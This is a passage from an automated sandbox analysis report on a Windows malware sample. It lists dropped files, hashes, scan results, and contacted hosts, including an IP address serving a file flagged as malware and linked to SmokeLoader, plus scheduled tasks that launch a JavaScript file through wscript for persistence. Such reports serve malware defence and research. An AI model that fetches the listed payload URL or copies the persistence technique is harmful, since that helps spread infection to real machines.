            C:\Users\user\AppData\Local\Temp\_MEI57242\_decimal.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\_hashlib.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\_lzma.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\_socket.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\cryptography\hazmat\bindings\_rust.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\libcrypto-3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\python3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\python312.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\select.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\ucrtbase.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI57242\unicodedata.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI78962\VCRUNTIME140.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI78962\_bz2.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI78962\_cffi_backend.cp312-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI78962\_decimal.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI78962\_hashlib.pyd0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://www.apache.org/licenses/0%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://cryptography.io/0%Avira URL Cloudsafe
            http://ocsp.di0%Avira URL Cloudsafe
            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader0%Avira URL Cloudsafe
            https://github.com/pyca/cryptography/0%Avira URL Cloudsafe
            http://www.autoitscript.com/autoit3/X0%Avira URL Cloudsafe
            https://github.com/python/cpython/issues/86361.0%Avira URL Cloudsafe
            http://crl.microsoft80%Avira URL Cloudsafe
            https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main0%Avira URL Cloudsafe
            https://docs.python.org/3/howto/mro.html.0%Avira URL Cloudsafe
            https://github.com/pyca/cryptography0%Avira URL Cloudsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            http://51.77.140.740%Avira URL Cloudsafe
            https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%Avira URL Cloudsafe
            https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy0%Avira URL Cloudsafe
            https://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
            https://img.shields.io/pypi/v/cryptography.svg0%Avira URL Cloudsafe
            https://cryptography.io/en/latest/installation/0%Avira URL Cloudsafe
            https://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
            https://github.com/pyca/cryptography/actions?query=workflow%3ACI0%Avira URL Cloudsafe
            https://cryptography.io/en/latest/changelog/0%Avira URL Cloudsafe
            https://cryptography.io/en/latest/security/0%Avira URL Cloudsafe
            https://mail.python.org/mailman/listinfo/cryptography-dev0%Avira URL Cloudsafe
            http://51.77.140.74/pages/Update.exe100%Avira URL Cloudmalware
            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py0%Avira URL Cloudsafe
            https://cryptography.io0%Avira URL Cloudsafe
            http://51.77.140.74/p0%Avira URL Cloudsafe
            https://github.com/pyca/cryptography/issues0%Avira URL Cloudsafe
            https://readthedocs.org/projects/cryptography/badge/?version=latest0%Avira URL Cloudsafe
            https://pypi.org/project/cryptography/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            uJZnxDofibxcgfjvDTnvqoPmvCzWh.uJZnxDofibxcgfjvDTnvqoPmvCzWh
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://51.77.140.74/pages/Update.exefalse
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000019.00000002.2551367457.0000000005F9C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000019.00000002.2548439087.0000000005086000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000019.00000002.2548439087.0000000005086000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://github.com/pyca/cryptographyUpdate.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://cryptography.io/Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://go.micropowershell.exe, 00000019.00000002.2548439087.0000000005579000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://ocsp.diUpdate.exe, 0000001E.00000003.2547169159.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574429448.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerUpdate.exe, 00000021.00000003.2573956569.000001F13C7BA000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000021.00000003.2574377246.000001F13C7B4000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000021.00000003.2574844499.000001F13C7B8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/Licensepowershell.exe, 00000019.00000002.2551367457.0000000005F9C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://github.com/python/cpython/issues/86361.Update.exe, 00000021.00000003.2596955655.000001F13CCD7000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000021.00000003.2597360664.000001F13CC33000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000021.00000003.2597543787.000001F13CCD7000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000023.00000003.2621732064.000002066B75C000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000023.00000003.2621678079.000002066B7CF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 00000019.00000002.2551367457.0000000005F9C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://github.com/pyca/cryptography/Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.apache.org/licenses/Update.exe, 0000001E.00000003.2556153238.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584214055.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.autoitscript.com/autoit3/Xhfi47s4wOT.exe, 00000000.00000003.1614139847.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659496370.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000000.1651745868.0000000000755000.00000002.00000001.01000000.00000006.sdmp, MindZenithPro.pif, 00000013.00000000.1684597470.0000000000495000.00000002.00000001.01000000.00000008.sdmp, MindZenithPro.pif, 00000014.00000002.1707877237.0000000000495000.00000002.00000001.01000000.00000008.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=mainUpdate.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://crl.microsoft8powershell.exe, 00000019.00000002.2554339999.000000000769E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://nsis.sf.net/NSIS_ErrorErrorhfi47s4wOT.exe, 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmp, hfi47s4wOT.exe, 00000000.00000000.1611617353.0000000000408000.00000002.00000001.01000000.00000003.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://docs.python.org/3/howto/mro.html.Update.exe, 00000021.00000003.2573855463.000001F13C7E3000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000023.00000003.2599883310.000002066B291000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000023.00000003.2598916175.000002066B2C6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#Update.exe, 00000021.00000003.2573956569.000001F13C7BA000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000021.00000003.2574377246.000001F13C7B4000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000021.00000003.2574844499.000001F13C7B8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://51.77.140.74powershell.exe, 00000019.00000002.2548439087.0000000005167000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.autoitscript.com/autoit3/hfi47s4wOT.exe, 00000000.00000003.1620604570.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659496370.0000000003A2C000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/pyca/cryptography/actions?query=workflow%3ACIUpdate.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/Pester/Pesterpowershell.exe, 00000019.00000002.2548439087.0000000005086000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://cryptography.io/en/latest/installation/Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syUpdate.exe, 00000021.00000003.2573956569.000001F13C7BA000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000021.00000003.2574377246.000001F13C7B4000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000021.00000003.2574844499.000001F13C7B8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.apache.org/licenses/LICENSE-2.0Update.exe, 0000001E.00000003.2556153238.000001FA879FF000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2556153238.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2556309729.000001FA879FF000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584363779.000001BD7FBA1000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584214055.000001BD7FBA1000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584214055.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://img.shields.io/pypi/v/cryptography.svgUpdate.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/pscore6lBpowershell.exe, 00000019.00000002.2548439087.0000000004F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2576897760.0000000005251000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://cryptography.io/en/latest/changelog/Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://cryptography.io/en/latest/security/Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/powershell.exe, 00000019.00000002.2551367457.0000000005F9C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000019.00000002.2551367457.0000000005F9C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://mail.python.org/mailman/listinfo/cryptography-devUpdate.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyUpdate.exe, 00000021.00000003.2574844499.000001F13C7B8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://51.77.140.74/ppowershell.exe, 0000001F.00000002.2576897760.00000000053A5000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000019.00000002.2548439087.0000000004F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2576897760.0000000005251000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://cryptography.ioUpdate.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/pyca/cryptography/issuesUpdate.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://readthedocs.org/projects/cryptography/badge/?version=latestUpdate.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://pypi.org/project/cryptography/Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              51.77.140.74
              		unknownFrance
              		16276OVHFRfalse

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1483258
              Start date and time:2024-07-26 23:13:06 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 12m 21s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:63
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:hfi47s4wOT.exe
              renamed because original name is a hash value
              Original Sample Name:b74b4dc696daa20dccd7f743c8c1e1a2.exe
              Detection:MAL
              Classification:mal100.evad.winEXE@102/187@1/1
              EGA Information:
              • Successful, ratio: 50%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 81
              • Number of non-executed functions: 294
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target RegAsm.exe, PID 7824 because it is empty
              • Execution Graph export aborted for target RegAsm.exe, PID 8156 because it is empty
              • Execution Graph export aborted for target powershell.exe, PID 2504 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size exceeded maximum capacity and may have missing network information.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • VT rate limit hit for: hfi47s4wOT.exe

              Simulations

              Behavior and APIs

              TimeTypeDescription
              17:13:52API Interceptor1x Sleep call for process: hfi47s4wOT.exe modified
              17:13:56API Interceptor1x Sleep call for process: Surrey.pif modified
              17:14:20API Interceptor137x Sleep call for process: powershell.exe modified
              17:15:33API Interceptor1x Sleep call for process: tmp11jjwww2.exe modified
              17:15:35API Interceptor1x Sleep call for process: tmpgtnhdrk0.exe modified
              22:13:57Task SchedulerRun new task: MindZenithPro path: wscript s>//B "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js"
              22:13:57Task SchedulerRun new task: Webster path: wscript s>//B "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js"
              22:15:43Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              51.77.140.74file.exeGet hashmaliciousSmokeLoaderBrowse
              • 51.77.140.74/pages/BallsClassified.exe
              file.exeGet hashmaliciousSmokeLoaderBrowse
              • 51.77.140.74/pages/BallsClassified.exe

              Domains

              No context

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              OVHFRfile.exeGet hashmaliciousSmokeLoaderBrowse
              • 51.77.140.74
              new.batGet hashmaliciousUnknownBrowse
              • 51.89.199.99
              Aurora.exeGet hashmaliciousAurora, Quasar, RedLine, XmrigBrowse
              • 51.79.71.77
              https://new-sneww-online-nowz-all.azurewebsites.net/?referrer=appmetrica_tracking_id%3D173005530304969909%26ym_tracking_id%3D10094745761516744100Get hashmaliciousUnknownBrowse
              • 54.36.150.186
              FkJbps6Srrl6lOQ9M_l8dpw2.exeGet hashmaliciousRedLineBrowse
              • 51.195.145.80
              VvlYJBzLuW.elfGet hashmaliciousMiraiBrowse
              • 37.59.105.215
              7Y18r(169).exeGet hashmaliciousCryptOneBrowse
              • 51.81.194.202
              Endermanch@Antivirus.exeGet hashmaliciousBdaejecBrowse
              • 54.39.157.64
              Endermanch@Antivirus.exeGet hashmaliciousBdaejecBrowse
              • 54.39.157.64
              file.exeGet hashmaliciousSystemBCBrowse
              • 144.217.158.194

              JA3 Fingerprints

              No context

              Dropped Files

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.piffile.exeGet hashmaliciousSmokeLoaderBrowse
                file.exeGet hashmaliciousVidarBrowse
                  file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                    file.exeGet hashmaliciousSmokeLoaderBrowse
                      LisectAVT_2403002A_36.exeGet hashmaliciousRemcosBrowse
                        LisectAVT_2403002B_223.exeGet hashmaliciousRemcosBrowse
                          80441fcf.exeGet hashmaliciousLummaCBrowse
                            7d69f17f.exeGet hashmaliciousRedLineBrowse
                              Filezillawin_94199_patched.exeGet hashmaliciousUnknownBrowse
                                Filezillawin_94199_patched.exeGet hashmaliciousUnknownBrowse

                                  Created / dropped Files

                                  C:\Program Files\Google\Chrome\updater.exe

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exe
                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):59428352
                                  Entropy (8bit):7.532141685262463
                                  Encrypted:false
                                  SSDEEP:786432:djtzBfpYNswjvUN6AEurPfVKr7RZo5EXmcfJjKDbNm/GAdHNdSfQm/GAdENdSf4Z:dtBfpYvAEuLfVeta5EXr+kF
                                  MD5:C84101CF9E883A329337A3BA6BC74733
                                  SHA1:2F7D2219C7788E93093C9700C244D3828603789B
                                  SHA-256:28D458B0629031FD6571BF3D14E10BD3BCD887AB2AE9456B0988EECBD69A682C
                                  SHA-512:606FADC56DB63EEA1EC1F088687BEC54011BAE433936CA59446BDA221BE58D5F680913ABC340727D7F620FF1FF677C817207D521C51175FB01B14D5C2DA62D1B
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 67%
                                  Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d....r.f...............&........*.............@.............................p......o....`... .............................................. ..4....P..........x............`..8........................... ...(...................."..P............................text...............................`..`.data...@...........................@....rdata...A...p...B...P..............@..@.pdata..x...........................@..@.xdata..d...........................@..@.bss....@)...............................idata..4.... ......................@....CRT....`....0.....................@....tls.........@.....................@....rsrc........P.....................@....reloc..8....`.....................@..B........................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe
                                  File Type:CSV text
                                  Category:dropped
                                  Size (bytes):226
                                  Entropy (8bit):5.360398796477698
                                  Encrypted:false
                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                  MD5:3A8957C6382192B71471BD14359D0B12
                                  SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                  SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                  SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                  Malicious:false
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):8003
                                  Entropy (8bit):4.840877972214509
                                  Encrypted:false
                                  SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
